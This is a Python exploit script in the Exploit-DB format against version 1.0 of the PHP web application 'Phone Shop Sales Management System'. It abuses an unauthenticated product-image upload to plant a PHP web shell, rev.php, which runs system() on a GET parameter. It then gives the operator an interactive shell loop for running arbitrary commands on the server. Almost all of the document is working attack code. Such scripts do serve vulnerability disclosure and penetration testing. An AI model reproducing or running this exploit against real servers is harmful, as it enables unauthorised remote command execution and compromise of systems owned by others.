# Exploit Title: Phone Shop Sales Management System - Arbitrary File Upload (Unauthenticated)
# Date: 20/04/21
# Exploit Author: Richard Jones
# Vendor Homepage: https://www.sourcecodester.com/php/10882/phone-shop-sales-managements-system.html
# Version: 1.0
# Tested on: Windows 10 build 19041 + xampp 3.2.4

import requests
import sys

IP="127.0.0.1" # CHANGE ME

ADDURL=f"https://{IP}/osms/Execute/ExAddProduct.php"
CALLSHELLURL=f"https://{IP}/osms/assets/img/Product_Uploaded/rev.php"
s = requests.Session()

def postShell():

    data = {
        "ProductName":"1",
        "BrandName":"1",
        "ProductPrice":1,
        "Quantity":"1",
        "TotalPrice":1,
        "DisplaySize":"1",
        "OperatingSystem":"1",
        "Processor":"1",
        "InternalMemory":"1",
        "RAM":"1",
        "CameraDescription":"1",
        "BatteryLife":"1",
        "Weight":"1",
        "Model":"1",
        "Dimension":"1",
        "date2":"1",
        "Description":"1",
        "_wysihtml5_mode":"1",
       }

    
    fileData = {
        'ProductImage':("rev.php","<?php system($_GET['c']);?>", "application/octet-stream")}

    r = s.post(ADDURL, files=fileData, data=data)
    
    if "The product is successfully added" in r.text:
        return True
    else:
        return False

def runWebShell():
    try:
        while True:
            cmd=input("\033[32;1m" +"$: "+ "\033[0m")
            if cmd == "exit":
                sys.exit()
            r = s.get(f"{CALLSHELLURL}?c={cmd}", verify=False)
            if r.status_code == 200:
                print(r.text)
            else:
                raise Exception("Cmd error")
    except KeyboardInterrupt():
        sys.exit()

def banner():
    ban = r"""__________.__                             _________.__                      _________      .__                     _____         _________    
\______   \  |__   ____   ____   ____    /   _____/|  |__   ____ ______    /   _____/____  |  |   ____   ______   /     \       /   _____/    
 |     ___/  |  \ /  _ \ /    \_/ __ \   \_____  \ |  |  \ /  _ \\____ \   \_____  \\__  \ |  | _/ __ \ /  ___/  /  \ /  \      \_____  \     
 |    |   |   Y  (  <_> )   |  \  ___/   /        \|   Y  (  <_> )  |_> >  /        \/ __ \|  |_\  ___/ \___ \  /    Y    \     /        \    
 |____|   |___|  /\____/|___|  /\___  > /_______  /|___|  /\____/|   __/  /_______  (____  /____/\___  >____  > \____|__  / /\ /_______  / /\ 
               \/            \/     \/          \/      \/       |__|             \/     \/          \/     \/          \/  \/         \/  \/ """

    return ban

def main():
    print("\033[34;1m" + banner() + "\033[0m")
    print("\033[32;1m" + "Created by Richard Jones 20/04/2021"+ "\033[0m" + "\n")
    print("\033[72;1m" +"[+] Sending WebShell..."+ "\033[0m")
    if postShell():
        print("\033[72;1m" +"[+] Calling WebShell..."+ "\033[0m")
        runWebShell()

if __name__ == "__main__":
    main()